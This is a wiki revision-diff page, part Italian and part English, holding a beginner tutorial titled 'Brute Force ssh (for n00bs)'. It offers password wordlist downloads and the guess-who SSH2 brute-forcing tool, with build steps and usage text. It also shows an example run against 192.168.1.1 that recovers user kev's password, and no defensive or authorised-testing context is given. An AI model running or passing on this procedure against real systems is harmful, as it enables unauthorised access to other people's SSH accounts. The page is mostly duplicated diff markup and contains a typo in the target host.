Differenze per "BruteForce_ssh_eng"

Differenze tra le versioni 1 e 2

Brute Force ssh (for n00bs)

Required Files and programs

It is NOT required to download ALL files here. Please read CAREFULLY! BR

Choose 1 from the following: BR

attachment:all_merged.tar.gz	attachment:all_merged.zip	(~20MB! - 67MB uncompressed)	- Several passwords
attachment:common_merged.tar.gz	attachment:common_merged.zip	(~6.5MB - 18MB uncompressed)	- Selection of common passwords

Required Program: BR
- attachment:guess-who-0.44.tgz (16.1 KB) - Programmino Linux per svolgere il brute Forcing BR
In caso si voglia creare dei file con le password più personalizzati scaricare il seguente programma BR
- attachment:uumerge.zip (55.1 KB) - Programmino Wind0ws per fare il merge di file di testo BR
Archivi con le password in file separati
- attachment:common.tar.gz | attachment:common.zip (35 file - 6322.2 KB) - Archivio con diversi file di testo non uniti in un unico file(~6MB) BR attachment:all.tar.gz | attachment:all.zip (46 file - 19130.5 KB) - Archivio con diversi file di testo non uniti in un unico file (~20MB!) BR

Procedura

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. BR It is available from http://packetstormsecurity.org/ BR BR Installation: BR Download to the desired directory BR

tar -zxvf guess-who-0.44.tgz
make

BR Execution: BR

[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

Expected output: BR

[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]

As you can see the user kev has a password of arsenal BR

-  ⇤ ← Versione 1 del 2007-03-31 12:05:35 → 
  Dimensione: 875
  Autore: ac3bf1
  Commento:
+   ← Versione 2 del 2007-03-31 12:09:04 → ⇥
  Dimensione: 2107
  Autore: ac3bf1
  Commento:
-Le cancellazioni sono segnalate in questo modo.
+Le aggiunte sono segnalate in questo modo.
 Linea 1:
+== Brute Force ssh (for n00bs) ==

=== Required Files and programs ===

It is ''' NOT ''' required to download ALL files here. Please read ''' CAREFULLY! ''' [[BR]]
 * Choose ''' 1 ''' from the following: [[BR]]

   || attachment:all_merged.tar.gz || attachment:all_merged.zip || ('''~20MB!''' - 67MB uncompressed) || - Several passwords ||
   || attachment:common_merged.tar.gz || attachment:common_merged.zip || (~6.5MB - 18MB uncompressed) || - Selection of common passwords ||

   [[BR]]
 * Required Program: [[BR]]
   attachment:guess-who-0.44.tgz (16.1 KB) - Programmino Linux per svolgere il brute Forcing [[BR]]
 * In caso si voglia creare dei file con le password più personalizzati scaricare il seguente programma [[BR]]
   attachment:uumerge.zip (55.1 KB) - Programmino Wind0ws per fare il merge di file di testo [[BR]]
 * Archivi con le password in file separati
   attachment:common.tar.gz | attachment:common.zip (35 file - 6322.2 KB) - Archivio con diversi file di testo non uniti in un unico file'''(~6MB)'''  [[BR]]
   attachment:all.tar.gz | attachment:all.zip (46 file - 19130.5 KB) - Archivio con diversi file di testo non uniti in un unico file '''(~20MB!)''' [[BR]]

=== Procedura ===